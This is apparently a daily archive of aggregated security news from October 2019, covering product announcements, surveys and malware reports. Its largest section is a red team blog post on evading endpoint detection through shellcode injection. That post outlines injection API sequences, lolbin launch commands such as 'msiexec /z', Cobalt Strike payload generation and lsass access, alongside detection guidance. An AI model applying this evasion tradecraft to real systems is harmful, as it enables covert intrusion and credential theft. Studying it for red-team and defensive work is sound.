Daily Archives: October 10, 2019

New infosec products of the week: October 11, 2019

FireEye Digital Threat Monitoring: Visibility beyond your walls FireEye Digital Threat Monitoring automatically collects and analyzes content on the dark and open web, alerting defenders whenever a potential threat is detected. By exposing threats early, organizations can more effectively identify breaches, exposures, and digital threats before they escalate – without adding operational complexity for the current security team. FileCloud launches Smart DLP, a real-time data leak prevention solution FileCloud Smart DLP is an intelligent, rule-driven … More

The post New infosec products of the week: October 11, 2019 appeared first on Help Net Security.

11 steps organizations should take to improve their incident response strategy

As the year draws to a close, it is time for businesses across all industries and sectors to reflect and prepare for the upcoming new year. With this in mind, FIRST has produced 11 vital steps that organizations should take to improve their incident response strategy. It is highly likely that an organization will face a cybersecurity incident of some sort at some point in its lifetime, regardless of the level of cybersecurity defense in … More

The post 11 steps organizations should take to improve their incident response strategy appeared first on Help Net Security.

ICS cybersecurity investment should be a priority in protecting operations from disruption

93% of ICS security professionals are concerned about cyberattacks causing operational shutdown or customer-impacting downtime, according to a Tripwire survey. In an effort to prepare against such threats, 77% have made ICS cybersecurity investments over the past two years, but 50% still feel that current investments are not enough. The survey was conducted by Dimensional Research and its respondents included 263 ICS security professionals at energy, manufacturing, chemical, dam, nuclear, water, food, automotive and transportation … More

The post ICS cybersecurity investment should be a priority in protecting operations from disruption appeared first on Help Net Security.

New method validates the integrity of computer chips using x-rays

Guaranteeing that computer chips, that can consist of billions of interconnected transistors, are manufactured without defects is a challenge. But how to determine if a chip is compromised? Now a technique co-developed by researchers at the Paul Scherer Institut in Switzerland and researchers at the USC Viterbi School of Engineering would allow companies and other organizations to non-destructively scan chips to ensure that they haven’t been altered and that they are manufactured to design specifications … More

The post New method validates the integrity of computer chips using x-rays appeared first on Help Net Security.

5G is here, now what?

5G is being positioned as a “network of networks” that will encompass public and private components, licensed and unlicensed spectrum, and even expand beyond cellular, to satellite communications. But in reality, 5G will only be one component of the enterprise vertical technology stack, states ABI Research. “The telco industry has somewhat designed 5G as a technology that will complement, or even replace, several other competing communication technologies. This is, in fact, built into the standard: … More

The post 5G is here, now what? appeared first on Help Net Security.

Okta SecurityInsights enables large enterprises to take action across their orgs to improve security

Okta, the leading independent provider of identity for the enterprise, announced Okta SecurityInsights, a family of product innovations that provides global organizations with personalized security detection and remediation capabilities at the end user, administrator, and customer network level. Okta is introducing two features of SecurityInsights: UserInsight, suspicious activity reporting for end users, and HealthInsight, customized, dynamic security best practice recommendations for administrators. These end user and administrator functionalities build on Okta’s investments in ThreatInsight, network … More

The post Okta SecurityInsights enables large enterprises to take action across their orgs to improve security appeared first on Help Net Security.

Hacking Is Not a Crime! Additional Thoughts from DEFCON 2019

In my previous post, I spoke about all of the different DEFCON villages where attendees can learn about and purchase all sorts of fun hacking/counter hacking tools. Even so, I covered only a small fraction of the activities at the conference. For example, attendees have the opportunity to participate in a lot of contests run […]… Read More

The post Hacking Is Not a Crime! Additional Thoughts from DEFCON 2019 appeared first on The State of Security.

IAR Systems launches new version of its security development tool C-TrustTM

IAR Systems, the future-proof supplier of software tools and services for embedded development, has launched a new version of its security development tool C-TrustTM. Version 1.30 adds a new Security Context Profile that automatically includes the configurations needed for basic device security and Intellectual Property (IP) protection. In addition, IAR Systems is very pleased to announce support for several devices from STMicroelectronics’ STM32F4 and L4 families, as well as NXP Semiconductors’ Kinetis K65 and K66 … More

The post IAR Systems launches new version of its security development tool C-TrustTM appeared first on Help Net Security.

CCC’s Digital Key Release 2.0 specification to be completed by end of 2019

The Car Connectivity Consortium (CCC) announced that its Digital Key Release 2.0 specification, which leverages Near Field Communication (NFC) technology to enable compatible mobile devices such as smartphones to securely access vehicles, is planned for completion by the end of 2019. Release 2.0 introduces a new scalable architecture to support mass adoption, while reducing development costs for adopters and ensuring interoperability between a variety of smart mobile devices and cars. In addition, the consortium has … More

The post CCC’s Digital Key Release 2.0 specification to be completed by end of 2019 appeared first on Help Net Security.

Rancher Labs’ Rancher 2.3 brings the benefits of Kubernetes to Windows apps

Rancher Labs, creators of the industry’s most widely adopted Kubernetes management platform, announced the general availability of Rancher 2.3. The latest release of their flagship product includes support for Windows containers, integration of Istio service mesh, and new cluster templates that provide enhanced security for large scale deployments of Kubernetes. These new capabilities strengthen Rancher’s Run Kubernetes Everywhere strategy by enabling an even broader range of enterprises to leverage the transformative power of Kubernetes. “Gartner … More

The post Rancher Labs’ Rancher 2.3 brings the benefits of Kubernetes to Windows apps appeared first on Help Net Security.

Sectigo partners with SPYRUS to help universities and enterprises protect against ransomware attacks

Sectigo, the world’s largest commercial Certificate Authority (CA) and a provider of purpose-built and automated PKI management solutions, announced a partnership with SPYRUS, a provider of cryptographic operating systems delivering the strongest protection for data in motion, at rest, and at work, to help universities and enterprises protect against ransomware attacks. By collaborating, Sectigo and SPYRUS ensure the confidentiality, integrity, and availability of sensitive data, enabling organizations to combat ransomware attacks. “It is increasingly important … More

The post Sectigo partners with SPYRUS to help universities and enterprises protect against ransomware attacks appeared first on Help Net Security.

With MSPAlliance membership, Portnox aims to strengthen cybersecurity for businesses

Portnox, a market leader for enterprise-grade wifi security, network visibility, access control and device risk management solutions, announced that it has joined MSPAlliance. With more than 30,000 cloud computing and managed service provider (MSP) corporate members, MSPAlliance has grown to become the largest industry association and certification body for cloud computing and managed service professionals. As a member of MSPAlliance, Portnox seeks to help MSPs deliver simplified enterprise-grade network security solutions to their clients in … More

The post With MSPAlliance membership, Portnox aims to strengthen cybersecurity for businesses appeared first on Help Net Security.

Integration Partners adds the ability to resell technologies available in Cloud Marketplaces

Integration Partners has added the ability to resell technologies available in Amazon’s Web Services (AWS), Microsoft’s Azure, and Google Cloud Marketplaces. These technologies include workload and storage applications as well as security technologies. This newly added capability will enable Integration Partner’s customers the ability to purchase and consume cloud-based technologies from one source. More importantly, customers with a multi cloud strategy now have the flexibility in managing and deploying their licenses at any time without … More

The post Integration Partners adds the ability to resell technologies available in Cloud Marketplaces appeared first on Help Net Security.

OPSWAT joins the VMware Technology Alliance Partner program

OPSWAT, a leading critical infrastructure protection company, announced it has joined the VMware Technology Alliance Partner (TAP) program. OPSWAT has collaborated with VMware to better protect enterprises against cyber threats posed by both unmanaged, particularly BYOD, as well as managed devices to help meet security policy mandates and avoid noncompliance fines. Enhance the VMware Unified Access Gateway and Horizon Client’s ability to assess devices for compliance violations and security issues Prevent data losses through screen … More

The post OPSWAT joins the VMware Technology Alliance Partner program appeared first on Help Net Security.

Etisalat Digital productizes SonicWall technology in its “Business QuickStart” broadband bundle for SMBs

SonicWall announced that Etisalat Digital has productized SonicWall technology in its ‘Business QuickStart (BQS)’ broadband bundle for SMBs, offering telco-grade network security with a zero-touch installation feature. The industry pioneers’ combined efforts have resulted in protecting thousands of SMBs as they work to address the increasing demand for proven security solutions in the United Arab Emirates (UAE) and other regions supported by the Etisalat Group. “Security is no longer a luxury but a necessity that … More

The post Etisalat Digital productizes SonicWall technology in its “Business QuickStart” broadband bundle for SMBs appeared first on Help Net Security.

Trend Micro and Snyk provide open source vulnerability intelligence for DevOps

Trend Micro, the global leader in cloud security, announced a strategic partnership with Snyk, the leader in developer-first open source security. The partnership will focus on solving the unrelenting challenge that open source vulnerabilities create for developers, stemming from code-reuse, public repositories and open source. Together, Trend Micro and Snyk will help businesses manage the risk of vulnerabilities without interrupting the software delivery process. The combination of open source vulnerability intelligence from Snyk and Trend … More

The post Trend Micro and Snyk provide open source vulnerability intelligence for DevOps appeared first on Help Net Security.

Jeff Harrell joins Adaptiva as vice president of marketing

Adaptiva, a leading, global provider of endpoint management and security solutions for enterprise customers, announced that enterprise security veteran Jeff Harrell has joined the company as vice president of marketing. Harrell will use his more than 20 years of experience to oversee the marketing strategies and initiatives across a growing range of products designed to assist global enterprises with pressing endpoint management and security needs. “Jeff is known for his domain knowledge, creativity, and vision … More

The post Jeff Harrell joins Adaptiva as vice president of marketing appeared first on Help Net Security.

Fighting Human Nature: How to Combat Socially Engineered Account Takeover Attacks

Learn from a former U.S. Cybercriminal on why social engineering is one of the most difficult to stop online crimes.

As a fraud management leader, are you aware that social engineering is a widespread and increasingly common tactic used to takeover customer accounts? Learn more about why social engineering is one of the most dangerous and difficult to stop online crimes.

Majority of Americans Fail Basic Cybersecurity Awareness

A newly released study from the Pew Research Center revealed most Americans are not aware of basic cybersecurity practices.

The study surveyed 4,272 American adults on a variety of technology-related issues and found that most of them struggled with basic cybersecurity concepts. Only 28 percent of respondents were familiar with two-factor authentication, and only 30 percent were aware that “https://” in a web address meant the connection was encrypted. Only 2 percent of those surveyed answered all ten questions correctly.

On privacy-related issues, the survey saw showed significant gaps in basic knowledge. Less than half of the subjects could correctly define privacy policies as “contracts between websites and users about how those sites will use their data,” and only 24 percent were aware that “private browsing” only hides online activities from other people using the same computer.

Adults with bachelor’s or advanced degrees tended to consistently score higher than those with high school educations or less. Respondents aged 18-29 also performed better than those above the age of 65, although the gap was smaller than that of the level of education achieved. 

The lack of awareness regarding https and two-factor authentication is perhaps most troubling since there have been widespread efforts to encourage the usage of https, and recent data released suggesting two-factor authentication protects users against 99.9% of cyberattacks.

The findings of the study paint a bleak picture for cybersecurity in U.S. workplaces, where employee or contractor ignorance and negligence have consistently been one of the largest causes of data breaches for the last several years. 

See the Pew Research report here


The post Majority of Americans Fail Basic Cybersecurity Awareness appeared first on Adam Levin.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind BitPaymer and ransomware attacks has been found exploiting Windows zero-day for Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically download the updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove Bonjour updater.

The experts discovered that the Bonjour updater was vulnerable to the unquoted service path vulnerability.

Unquoted search paths are a relatively older vulnerability that occurs when the path to an executable service or program (commonly uninstallers) are unquoted and contain spaces. The spaces can allow someone to place their own executable in the path and get it to be executed instead.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

bitpaymer campaign

Experts explained that attackers using a legitimate process signed by a trusted vendor, like Bonjour, will be able to execute a new malicious child process evading detection. In this specific attack, security programs have not scanned the malicious payloads because they did not use an extension,

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.

Morphisec Labs reported their discovery to Apple that released iCloud for Windows 10.7iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users that have installed an Apple software on their Windows computer and then uninstalled it, should manually uninstall the Bonjour updater if present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

New Reductor Nation-State Malware Compromises TLS

Kaspersky has a detailed blog post about a new piece of sophisticated malware that it's calling Reductor. The malware is able to compromise TLS traffic by infecting the computer with hacked TLS engine substituted on the fly, "marking" infected TLS handshakes by compromising the underlining random-number generator, and adding new digital certificates. The result is that the attacker can identify, intercept, and decrypt TLS traffic from the infected computer.

The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we're quite sure the new malware was developed by the COMPfun authors.

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn't identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.


Turla has in the past shown many innovative ways to accomplish its goals, such as using hijacked satellite infrastructure. This time, if we're right that Turla is the actor behind this new wave of attacks, then with Reductor it has implemented a very interesting way to mark a host's encrypted TLS traffic by patching the browser without parsing network packets. The victimology for this new campaign aligns with previous Turla interests.

We didn't observe any MitM functionality in the analyzed malware samples. However, Reductor is able to install digital certificates and mark the targets' TLS traffic. It uses infected installers for initial infection through HTTP downloads from warez websites. The fact the original files on these sites are not infected also points to evidence of subsequent traffic manipulation.

The attribution chain from Reductor to COMPfun to Turla is thin. Speculation is that the attacker behind all of this is Russia.

How Cybercriminals Continue to Innovate

Europol Report: Ransomware, DDoS, Business Email Compromises Are Persistent Threats
Online attack threats continue to intensify, with criminals preferring ransomware, DDoS attacks and business email compromises, warns Europol, the EU's law enforcement intelligence agency. After numerous successful disruptions by police, criminals have responded by launching increasingly complex attacks.

Cisco Advances Communications Security with Completion of Automated Cryptographic Validation Protocol Testing

Today’s digital economy relies on secure communications in both our personal and business activities.  We expect that when private data is transmitted over the internet, or other communications channels, it will be protected against tampering and prying eyes.  The integrity and confidentiality of information is typically achieved using cryptography, mathematically based methods to encrypt and decrypt information.

We assume our communications are secure.  But are they?  Cryptography provides the foundation of secure communications, but how do we know that the cryptography we are using is correct and secure?  When was the last time you verified that the algorithms used have been implemented correctly?  Or that they have not been intentionally or unintentionally altered to make them less secure?

Fortunately for all of us, there are organizations that have active programs to do just this.  As highlighted in Anthony Grieco’s blog on “Automating Explicit Trust,” Cisco and industry leaders are working to develop technologies that provide explicit trust (i.e. evidence of trustworthiness) and enhance communications security.  A notable example is the Cryptographic Module Validation Program (CMVP) conducted by the National Institute of Standards and Technology (NIST) as a part of Federal Information Processing Standard (FIPS).  Many organizations are required to only utilize products that contain NIST validated cryptographic modules.  And this makes sense.  Leaders want the communications used in their organizations to be based on a sound foundation to ensure the integrity and confidentiality of their information.

Historically, CMVP testing required significant manual effort which made the endeavor both costly to vendors and extremely time consuming.  This resulted in vendors having to make hard decisions on which products and software versions to validate.  The organizations requiring this validation, saw the following:

  1. A smaller number of available validated products and software versions
  2. Having to choose between using a non-validated version of software that contains vulnerability fixes vs. using existing validated products with known vulnerabilities while waiting for the new software to be validated.

Recognizing the impact of this dilemma, NIST and industry have been working together to create the Automated Cryptographic Validation Testing (ACVT) program.  A bold and visionary move that should increase the number of validated products, reduce the lag between vulnerability fix and validation, and reduce risks inherent with manual operations.  This is all made possible with the new Automated Cryptographic Validation Protocol (ACVP) which provides the communications between product under test and the NIST test server.

The ACVT program is live and the NIST ACVT server is online.  Industry is actively incorporating ACVP into products.  Recently, Cisco successfully passed ACVT algorithm testing for one of its core cryptographic modules (validation # A4); thereby, formally validating the cryptography used to secure customer communications.

Network and system attacks by bad actors are frequently in the news.  It is encouraging to know there is now an industry defined, independent 3rd party capability available and in-use to validate that the cryptography used to secure communications.  +1 for the good guys.

Visit the Trust Center to learn more about Cisco’s commitment to trustworthiness, transparency, and accountability.

Additional references:

Industry Working Group on Automated Cryptographic Algorithm Validation

NIST: Security Testing, Validation and Measurement

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced malware piece of malware named Attor, targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced malware piece of malware named Attor, that was used in cyberespionage operations on diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor a state-sponsored group involved in highly targeted attacks on selected targets.

Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users, it targets popular Russian apps and services, including the social networks Odnoklassniki, and VKontakt, VoIP provider Multifon, IM apps Qip and Infium, search engine Rambler, email clients Yandex and Mail.ru, and payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target dropping the components on disk, then loads the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA, then they are recovered in memory, using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected. “

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered. ” continues the analysis.

The analysis of the samples of the malware revealed the presence of an interesting module designed to detect when users connected modems and older phones to their devices. The malware is able to collect info about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

Staying Hidden on the Endpoint: Evading Detection with Shellcode

True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response (EDR) products have matured over the years, the red teams must follow suit. This blog post will provide some insights into how the FireEye Mandiant Red Team crafts payloads to bypass modern EDR products and get full command and control (C2) on their victims’ systems.

Shellcode injection or its execution is our favorite method for launching our C2 payload on a victim system; but what is shellcode? Michael Sikorski defines shellcode as a “…term commonly used to describe any piece of self-contained executable code” (Practical Malware Analysis). Most commercial Penetration Testing Frameworks such as Empire, Cobalt Strike, or Metasploit have a shellcode generator built into the tool. The shellcode generator is generally in either a binary format or hex format depending on whether you generate it as raw output or as an application source.

Why do we use shellcode for all our payloads?

The use of shellcode in our red team assessment payloads allows us to be incredibly flexible in the type of payload we use. Shellcode runners can be in written in a wide range of programming languages that can be incorporated into many types of payloads. This flexibility allows us to customize our payloads to support the specific needs of our clients and of any given situation that may arise during a red team assessment. Since shellcode can be launched from inside a payload or injected into an already running process, we can use several techniques to increase the ability of our payloads to evade detection from EDR products depending on the scenario and technology in place in the target environment. Several techniques exist for obfuscating shellcode, such as encryption and custom encoding, that make it difficult for EDR products to detect shellcode from commercial C2 tools on its own. The flexibility and evasive properties of shellcode are the primary reason that we rely heavily on shellcode based payloads during red team assessments.

Shellcode Injection Vs. Execution

One of the most crucial parts of any red team assessment is developing a payload that will successfully, reliably, and stealthily run on the target system. Payloads can either execute shellcode from within its own process or inject shellcode into the address space of another process that will ultimately execute the shellcode. For the purposes of this blog post we’ll refer to shellcode injection as shellcode executed inside a remote process and shellcode execution as shellcode executed inside the payload process.

Shellcode injection is one technique that red teams and malicious attackers use to avoid detection from EDR products and network defenders. Additionally, many EDR products implement detections based on expected behavior of windows processes. For example, an attacker that executes Mimikatz from the context of an arbitrary process, let’s say DefinitelyNotEvil.exe, may get detected or blocked outright because the EDR tool does not expect that process to access lsass.exe. However, by injecting into a windows process, such as svchost.exe, that regularly touches lsass.exe, it may be possible to bypass these detections because the EDR product sees this as an expected behavior.

In this blog post, we’ll cover three different techniques for running shellcode.

  • CreateThread
  • CreateRemoteThread
  • QueueUserAPC

Each of these techniques corresponds to a Windows API function that is responsible for the allocation of a thread to the shellcode, ultimately resulting in the shellcode being run. CreateThread is a technique used for shellcode execution while CreateRemoteThread and QueueUserAPC are forms of shellcode injection.

The following is a high-level outline of the process for running shellcode with each of the three different techniques.

  1. Allocate memory in the current process
  2. Copy shellcode into the allocated memory
  3. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  4. Create a thread with the base address of the allocated memory segment
  5. Wait on the thread handle to return
  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate executable memory within the target process
  4. Write shellcode into the allocated memory
  5. Create a thread in the remote process with the start address of the allocated memory segment

Figure 1: Windows API calls for CreateRemoteThread injection

  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate memory within the target process
  4. Write shellcode into the allocated memory
  5. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  6. Open a thread in the remote process with the start address of the allocated memory segment
  7. Submit thread to queue for execution when it enters an “alertable” state
  8. Resume thread to enter “alertable” state

Figure 2: Windows API calls for QueueUserAPC injection

Command Execution

Let’s break down what we’ve talked about so far:

  • Malicious code is your shellcode – the stage 0 or stage 1 code that is truly going to do the malicious work.
  • Standard “shellcode runner” application which executes your code via either injection or execution. Most everyone writes their own shellcode runner, so we don’t necessarily deem this as true malware, the real malware is the shellcode itself.

Now that we’ve covered all that, we need a method to execute the code you compiled. Generally, this is either an executable (EXE) or a Dynamic Link Library (DLL). The Red Team prefers using Living Off the Land Binaries (lolbins) commands which will execute our compiled code.

The reason we can take advantage of lolbins is because of unmanaged exports. At a high level, when an executable calls a DLL it is looking for a specific export within the DLL to execute the code within that export. If the export is not properly protected, then you can craft your own DLL with the export name you know the executable is looking for and run your arbitrary code; which in this case will be your shellcode runner.

Putting It All Together

We set out to develop a shellcode runner DLL that takes advantage of lolbins through unmanaged exports while also providing the flexibility to execute both injected and non-injected shellcode without a need to update the code base. This effort resulted in a C# shellcode runner called DueDLLigence, for which the source code can be found at the GitHub page.

The DueDLLigence project provides a quick and easy way to switch between different shellcode techniques described previously in this blog post by simply switching out the value of the global variable shown in Figure 3.

Figure 3: Shellcode technique variable

The DueDLLigence DLL contains three unmanaged exports inside of it. These exports can be used with the Rasautou, Control, and Coregen native Windows commands as described in Figure 4. Note: The shellcode that is in the example will only pop calc.

Native Windows Executable

Required Export Name

Syntax Used To Run



rasautou –d {full path to dll} –p powershell –a a –e e



Rename compiled “dll” extension to “cpl” and just double click it!



msiexec /z {full path to dll}

Figure 4: DueDLLigence execution outline

When you open the source code you will find the example uses the exports shown in Figure 5.

Figure 5: Source code for exported entry points

The first thing you should do is generate your own shellcode. An example of this is shown in Figure 6, where we use Cobalt Strike to generate raw shellcode for the “rev_dns” listener. Once that is complete, we run the base64 -w0 payload.bin > [outputFileName] command in Linux to generate the base64 encoded version of the shellcode as shown in Figure 7.

Figure 6: Shellcode generation

Figure 7: Converting shellcode to base64

Then you simply replace the base64 encoded shellcode on line 58 with the base64'd version of your own x86 or x64 shellcode. The screenshot in Figure 6 generated an x86 payload, you will need to check the “use x64 payload” box to generate an x64 payload.

At this point you should reinstall the Unmanaged exports library in the DueDLLigence Visual Studio project because sometimes when you’re using a different project it doesn’t work properly. You can reinstall opening the NuGet package manager console shown in Figure 8 and running the Install-Package UnmanagedExports -Version 1.2.7 command.

Figure 8: Open NuGet Package Manager

After you have reinstalled the Unmanaged exports library and replaced the base64 encoded shellcode on line 58 then you are ready to compile! Go ahead and build the source and look for your DLL in the bin folder. We strongly suggest that you test your DLL to ensure it has the proper exports associate with it. Visual Studio Pro comes with the Dumpbin.exe utility which you can run against your DLL to view the exports as shown in Figure 9.

Figure 9: Dumpbin.exe output

You can expand the list as much as you want with more lolbin techniques found over at the GitHub page.

We prefer to remove the unmanaged exports that are not going to be used with the respective payload that was generated so there is a smaller footprint in the payload. In general, this is good tradecraft when crafting payloads or writing code. In our industry we have the principle of least privilege, well this is the principle of least code!

Modern Detections for Shellcode Injection

Despite all the evasive advantages that shellcode offers, there is hope when it comes to detecting shellcode injection. We looked at several different methods for process injection.

In our shellcode runner, the shellcode injection techniques (CreateRemoteThread and QueueUserAPC) spawn a process in a suspended state and then inject shellcode into the running process. Let’s say we choose the process to inject into as explorer.exe and our payload will run with MSIExec. This will create a process tree where cmd.exe will spawn msiexec.exe which will in turn spawn explorer.exe.

Figure 10: Process tree analysis

In an enterprise environment it is possible to collect telemetry data with a SIEM to determine how often, across all endpoints, the cmd.exe -> msiexec.exe -> explorer.exe process tree occurs. Using parent-child process relationships, defenders can identify potential malware through anomaly detection.

API hooking is commonly used by EDR and AV products to monitor and for detect the use of Windows API calls that are commonly used by malware authors. Utilizing kernel routines such as PsSetCreateProcessNotifyRoutine(Ex) and PsSetCreateThreadNotifyRoutine(Ex), security software can monitor when certain API calls are used, such as CreateRemoteThread. Combining this information with other data such as process reputation and enterprise-wide telemetry can be used to provide high fidelity alerts for potential malware.

When process injection occurs, one process modifies the memory protections of a memory region in another process’s address space. By detecting the use of API calls such as VirtualProtectEx that result in one process modifying the memory protections of address space allowed to another process, especially when the PAGE_EXECUTE_READWRITE permissions are used as this permission is used to allow the shellcode to be written and executed within the same memory space.

As red teamers and malicious actors continue to develop new process injection techniques, network defenders and security software continue to adapt to the ever-changing landscape. Monitoring Windows API function calls such as VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, and NTQueueAPCThread can provide valuable data for identifying potential malware. Monitoring for the use of CreateProcess with the CREATE_SUSPENDED and CREATE_HIDDEN flags may assist in detecting process injection where the attacker creates a suspended and hidden process to inject into.

As we’ve seen, process injection techniques tend to follow a consistent order in which they call Windows API functions. For example, both injection techniques call VirtualAllocEx followed by WriteProcessMemory and identifying when a process calls these two APIs in that order can be used as a basis for detecting process injection.


Using shellcode as the final stage for payloads during assessments allows Red Teams the flexibility to execute payloads in a wide array of environments while implementing techniques to avoid detection. The DueDLLigence shellcode runner is a dynamic tool that takes advantage of the evasive properties of both shellcode and process injection to offer Red Teams a way to avoid detection. Detections for the execution of LOLbins on the command line and process injection at the API and process level should be incorporated into defensive methodology, as attackers are increasingly being forced into living off the land with the increased adoption of application whitelisting.

New ISF Paper Attempts to Demystify AI in Information Security

New ISF Paper Attempts to Demystify AI in Information Security

In a paper released today, the Information Security Forum is urging organizations to capitalize on the opportunities offered by artificial intelligence while taking sensible steps to reduce the risks posed by this still immature technology.  

Demystifying Artificial Intelligence in Information Security defines exactly what AI is, then lays out a realistic analysis of what it can do, and will be able to do soon, for both legitimate organizations and criminals.

While detailing AI's potential to significantly improve cyber-defenses, especially around early threat detection, ISF's research recognizes that the technology carries with it the disease as well as the cure. 

Researchers wrote: "No matter the function for which an organization uses AI, such systems and the information that supports them have inherent vulnerabilities and are at risk from both accidental and adversarial threats. Compromised AI systems make poor decisions and produce unexpected outcomes.

"Simultaneously, organizations are beginning to face sophisticated AI-enabled attacks—which have the potential to compromise information and cause severe business impact at a greater speed and scale than ever before."

According to researchers, companies that have already adopted AI while it's still in its baby feathers have enjoyed benefits that include being able to counter existing threats more easily. But, as threat actors nurture their own twisted versions of the new technology to maturity, this early advantage will shrink into nothingness. 

"An arms race is developing," said ISF's managing director, Steve Durbin. "AI tools and techniques that can be used in defense are also available to malicious actors including criminals, hacktivists, and state-sponsored groups. 

"Sooner rather than later these adversaries will find ways to use AI to create completely new threats such as intelligent malware—and at that point, defensive AI will not just be a 'nice to have.' It will be a necessity."

Asked how far away the world is from intelligent malware, ISF senior research analyst Richard Absalom told Infosecurity Magazine: "Back in January 2018, in our publication Threat Horizon 2020, we predicted that intelligent malware would emerge by 2020. I don’t think that prediction is far off but can’t be sure—I wouldn’t bet my house on it! 

"What we do know is that attackers can already use AI tools to identify vulnerabilities—although human hackers are still better at exploiting them. As soon as that intelligent malware emerges, AI tools will be required to spot anomalous activity on the network and identify well-hidden malware. 

"For example, social engineering attacks that use deepfake videos and automated vishing are likely to make it impossible for human eyes and ears to identify what is real and what is fake—it may be that intelligent systems will be required to analyze all types of digital communications to establish source and authenticity."

Asked if the benefits of AI will always outweigh the risks, Absalom said: "Yes—if (big IF) the risks are managed properly. AI promises some really exciting developments for information security. The risks are not insurmountable but do require serious thought and investment to manage."

Online Gaming Risks and Kids: What to Know and How to Protect Them

Reading Time: ~ 4 min.

Online games aren’t new. Consumers have been playing them since as early as 1960. However, the market is evolving—games that used to require the computing power of dedicated desktops can now be powered by smartphones, and online gaming participation has skyrocketed. This unfortunately means that the dangers of online gaming have evolved as well. We’ve examined the top threats that parents need to know about to keep their kids safe while gaming online.

Check out our Antivirus protection for PC gaming without impact on your gameplay.

Online Bullying and Harassment

A recent study shows that 65% of players who participate in online gaming have been harassed; a statistic that does not bode well for underage gamers. Your first instinct may be to try to prevent your child from participating in online gaming altogether, but this may cause them to sneak playing time without your knowledge. A stronger choice would be to talk with your kids and prepare them for the types of negative behavior they may experience online, and to make sure they know they can come to you if they are being harassed. It’s also important to explain the impact that online bullying can have on others, and to set firm consequences if you catch your child participating in harassment or abusive language. Regulating the use of headsets can help prevent both your child’s exposure to and participation in online harassment.

